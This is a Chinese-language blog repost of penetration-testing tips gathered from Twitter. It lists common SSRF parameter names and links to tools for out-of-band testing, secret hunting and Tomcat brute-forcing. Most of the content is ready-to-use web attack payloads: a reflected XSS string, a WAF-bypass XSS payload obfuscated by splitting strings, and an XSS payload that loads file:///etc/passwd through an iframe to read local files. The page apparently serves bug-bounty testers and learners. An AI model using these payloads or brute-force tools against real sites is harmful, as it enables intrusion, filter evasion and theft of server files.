干货 | Twitter渗透技巧搬运工（三）

PEnticE

​干货 | Twitter渗透技巧搬运工（三） (qq.com)SSRF常用参数​​​

1. \?host=
   
2. ?redirect=
   
3. ?uri=
   
4. ?path=
   
5. ?continue=
   
6. ?url=
   
7. ?window=
   
8. ?next=
   
9. ?data=
   
10. ?image-source=
    
11. ?n=
    
12. ?to=
    
13. ?follow=
    
14. ?u=
    
15. ?go=
    
16. ?fetch=
    
17. ?source=
    
18. ?img-src=

复制代码

XSS/XXE 等攻击的在线有效负载，以测试和检测带外交互

​

​

地址：https://github.com/projectdiscovery/interactsh
Tips Rxss--><svg onload=alert(document.domain)>
shodan黑客语法

​

​

Pinkerton 是一款JavaScript 文件爬虫和密钥查找器

​

地址：https://github.com/oppsec/Pinkerton
tomcat爆破脚本工具

​

地址：https://github.com/oppsec/tomcter
XSS WafBypass

​

1. <svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b>

复制代码

练习地址：https://brutelogic.com.br/gym.ph ... +onbegin=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb%3E
从XSS到本地文件读取

1. <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

复制代码

来源：https://twitter.com/ADITYASHENDE ... sxyUlDopZzGIKAhSgWg
​